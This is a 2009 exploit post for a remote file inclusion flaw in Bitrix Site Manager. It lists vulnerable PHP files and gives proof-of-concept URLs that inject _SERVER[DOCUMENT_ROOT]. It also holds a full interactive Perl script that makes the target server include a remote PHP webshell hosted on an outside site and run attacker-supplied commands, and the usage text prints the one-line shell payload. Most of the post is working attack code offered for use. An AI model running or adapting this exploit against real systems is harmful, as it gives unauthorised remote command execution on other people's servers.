##### # [+] Author : Don Tukulesto (root@indonesiancoder.com) # [+] Date : November 13, 2009 # [+] Homepage : http://www.indonesiancoder.com # [+] Vendor : http://www.bitrixsoft.com/ # [+] Method : Remote File Inclusion # [+] Location : INDONESIA # [~] Notes : I know this is an old bugs, but i just write this exploit under perl module. # [~] Refrence : http://www.securityfocus.com/bid/13965 # [~] How To : # perl tux.pl <target> <weapon url> cmd # perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd # Weapon example: <?php system($_GET['cmd']); ?> ##### <!--more--> # [-] Bugs in [+] rss.php <pre lang="php"> <? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php"); ?> </pre> [+] redirect.php <pre lang="php"> <? define("GENERATE_EVENT","Y"); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if (CModule::IncludeModule("statistic")) { $goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto); } else { $goto = eregi_replace("#EVENT_GID#","",$goto); } LocalRedirect($goto); ?> </pre> [+] click.php <pre lang="php"> <? define("GENERATE_EVENT","Y"); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id); if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto); LocalRedirect($goto); ?> </pre> [+] admin/index.php <pre lang="php"> <? require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php"); include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php"); ?> <? include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php"); include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php"); ?> </pre> [+] tools/help.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?> </pre> [+] tools/calendar.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?> </pre> [+] tools/ticket_show_file.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?> </pre> [+] tools/imagepg.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?> </pre> [+] tools/help_view.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?> </pre> [+] tools/help_create.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?> </pre> [-] PoC http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]= [-] eXpL0!t c0des <pre lang="perl"> #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; $RoNz = $ARGV[0]; $Pathloader = $ARGV[1]; $Contrex = $ARGV[2]; if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()} head(); sub head() { print "[o]============================================================================[o]\r\n"; print " | Bitrix Site Manager Multiple Remote File Include Vulnerability |\r\n"; print "[o]============================================================================[o]\r\n"; } while() { print "[w00t] \$"; while(<STDIN>) { $kaMtiEz=$_; chomp($kaMtiEz); $arianom = LWP::UserAgent->new() or die; $tiw0L = HTTP::Request->new(GET =>$RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n"; $abah_benu = $arianom->request($tiw0L); $tukulesto = $abah_benu->content; $tukulesto =~ tr/[\n]/[�]/; if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";} elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit} elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($tukulesto =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[�]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[w00t] \$";}}}last; sub usage() { head(); print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n"; print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n"; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n"; print " | <cmd> - Command variable used in php shell |\r\n"; print "[o]============================================================================[o]\r\n"; print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n"; print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n"; print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n"; print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n"; print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n"; print "[o]============================================================================[o]\r\n"; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n"; print "[o]============================================================================[o]\r\n"; exit(); } </pre>